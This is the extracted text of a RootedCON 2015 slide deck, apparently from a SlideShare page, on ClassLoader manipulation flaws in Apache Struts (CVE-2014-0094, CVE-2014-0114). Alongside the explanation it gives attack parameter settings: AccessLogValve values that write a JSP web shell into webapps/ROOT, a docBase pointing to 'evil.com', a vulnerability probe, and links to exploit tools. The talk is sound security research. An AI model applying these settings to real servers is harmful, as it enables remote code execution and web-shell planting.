Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

RootedCON 2015 - Deep inside the Java framework Apache Struts

  • 1. Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
  • 2. Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
  • 3. ¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
  • 4. Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
  • 5. CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
  • 6. OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
  • 7. top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
  • 8. Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
  • 9. ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
  • 10. ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
  • 12. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
  • 14. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
  • 16. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
  • 17. NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
  • 18. Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
  • 19. DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
  • 20. Exploitability   Tested  against:     •  Tomcat  6  /  7  à  RCE  via  “docBase”  (win  only)   •  Tomcat  8  à  RCE  via  “AccessLogValve”   •  Glassfish  4  à  RCE  via  “docBase”  (win  only)   •  Websphere  8.5  (developer)  à  RCE  not  found   •  Weblogic  10  &  12  à  RCE  not  found   •  JBOSS  7.1  &  7.4  à  RCE  not  found  
  • 21. What  about  Struts  1   •  According  to  CVE-­‐2014-­‐0114,  Struts  1  is  also  vulnerable   •  Unpatched!  (struts  1  is  over  EoL,  but  is  sVll  in  use)     •  Different  reason:  Struts  1  no  OGNL  nor  Value  Stack   –  The  key:  bean  populaVon  with  BeanUVls       •  You  can  find  some  Alvaro  Muñoz  (@pwntester)  gold,  like   further  explanaVon  and  a  filter  to  be  applied  as  a   workaround,  at   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Protect-­‐your-­‐ Struts1-­‐applicaVons/ba-­‐p/6463188#.VBMB0i5_s0z   –  hpp://h30499.www3.hp.com/t5/HP-­‐Security-­‐Research-­‐Blog/Update-­‐your-­‐ Struts-­‐1-­‐ClassLoader-­‐manipulaVon-­‐filters/ba-­‐p/6639204#.VOsFG7CG_8Q  
  • 22. AccessLogValve  exploitaVon             A  log  file  with  name  shell1.jsp  is  created  at  webapps/ROOT.   When  requesVng  a  inexistent  URL,  it’s  logged  into  the  log  file   (that  it’s  going  to  be  interpreted  as  a  JSP  when  get  accessed).   .directory=webapps/ROOT     .prefix=shell   .suffix=.jsp   .fileDateFormat=1   1 2 3 4
  • 23. DEMO     AccessLogValve  exploitaVon     hpps://github.com/rapid7/metasploit-­‐framework/blob/master/modules/exploits/ mulV/hpp/struts_code_exec_classloader.rb  
  • 24. docBase  exploitaVon   •  “The  Document  Base  (also  known  as  the  Context   Root)  directory  for  this  web  applicaVon,  or  the   pathname  to  the  web  applicaDon  archive  file  (if  this   web  applicaVon  is  being  executed  directly  from  the   WAR  file).”   •  Legit  applicaVon  goes  down   .docBase=//evil.com/shared    
  • 25. About  metasploit  module   •  Tomcat  6/7  &  GlassFish  (docBase)     – Only  Win     – Not  landed  yet  in  trunk  but  works  fine   – Maphew  Hall  (0x41414141)  pull  requests:   hpps://github.com/rapid7/metasploit-­‐framework/pull/3074   hpps://github.com/rapid7/metasploit-­‐framework/pull/3075   hpps://github.com/rapid7/metasploit-­‐framework/pull/3323     – Same  module  than  before,  landed  yesterday  night  
  • 27. I  know  Kung-­‐fu                     •  Now  what?  
  • 28. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  2  sites   – Default  extension  for  Struts  2:  “.acVon”   •  Also,  when  default  configured,  it  accepts  both  “.acVon”   and  no  extension      
  • 31. Searching  Struts  sites   •  Dumb  detecVon  of  Struts  1  sites     – Default  extension  for  Struts  1:  “.do”    
  • 32. Searching  Struts  sites   hpps://web.archive.org/web/20060519001958/hpp://simonpeter.com/technology/ java/struts/sites.html  
  • 33. Vulnerability  checking   •  To  check  if  a  Struts  2  site  is  vulnerable,  modify   “cacheMaxSize”  property   –  Integer.MAX_VALUE  ==  2147483647  (in  x86)             •  Tomcat  6/7  &  Glassfish   •  Tomcat  8       2147483647   2147483648   AAAAAAAAA  
  • 34. Vulnerability  checking   •  In  Struts  1  if  the  conversion  String  to  Integer   fails  a  default  value  0  is  set   •  But  when  trying  to  set  a  method  that  receives   an  Object  with  a  String,  a  excepVon  is  raised       ROOTEDCON  
  • 35. OK  I  see,  but…        
  • 36. Previous  security  bulleVns         RCE,  when  form  validaDon  fails  field  values   are  interpreted  as  OGNL     RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL   RCE,  bypass  the  '#'-­‐usage  protecDon  built   into  the  ParametersInterceptor  to  execute   OGNL  !  S2-­‐003  fix  was  incomplete   RCE,  user’s  input  is  evaluated  as  OGNL  when   there’s  a  conversion  error   Several  RCE:  via  ExcepDonDelegator  (same   as  S2-­‐007),  CookieInterceptor  (same  idea   than  S2-­‐003  and  S2-­‐005),  etc.   RCE,  incomplete  fix  for  S2-­‐003  and  S2-­‐005  on   ParametersInterceptor    
  • 37. Previous  security  bulleVns         RCE,  incomplete  fix  for  S2-­‐003,  S2-­‐005  and   S2-­‐009  on  ParametersInterceptor  when   using  values  for  redirecDons   RCE,  s:url  and  s:a  tags,  when   "includeParams"  is  set,  allow  evaluaDng  the   values  of  request  parameters  as  OGNL.   RCE,  same  than  S2-­‐013,  incomplete  fix.   RCE,  acDons  using  wildcards  and  Double   OGNL  evaluaDon  allow  OGNL  injecDon   RCE:  DefaultAcDonMapper  short-­‐circuit   navigaDon  interpreted  as  OGNL   RCE,  what  we  saw  in  this  presentaDon  ☺   (ParametersInterceptor)     RCE,  Incomplete  fix  for  S2-­‐020   Incomplete  fix  for  S2-­‐020  and  S2-­‐021  
  • 39. Conclusions?   •  Seven  years  from  between  S2-­‐001  and  S2-­‐020   •  Same  kind  of  vulnerabiliVes:  injecDng  OGNL   from  user-­‐supplied  data     •  Several  bypasses  for  fixes   •  Almost  all  RCE       •  Take  your  own…  
  • 40. Bonus  track  -­‐  Confluence   •  Is  based  on  a  WebWork  fork  (previous  than  Struts  2)   •  If  you  look  their  bulleVns   –  Versions  up  to  and  including  5.5.1  vulnerable  to   ClassLoader  manipulaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory +2014-­‐05-­‐21     –  Versions  up  to  5.6  (before  5.6.6  and  5.5.7)  are  vulnerable   to  double  OGNL  evaluaDon   hpps://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-­‐ +2015-­‐01-­‐21   •  Don’t  they  look  familiar?  J  
  • 41. Bonus  track  -­‐  Confluence  
  • 42. QuesVons?   •  You  can  ask  also  :   – Poke  me  around   – by  twiper:  @julianvilas        
  • 43. QuesVons?   •  And  what  do  you  think  about  OGNL?     Thanks  for  aMending!!!  ☺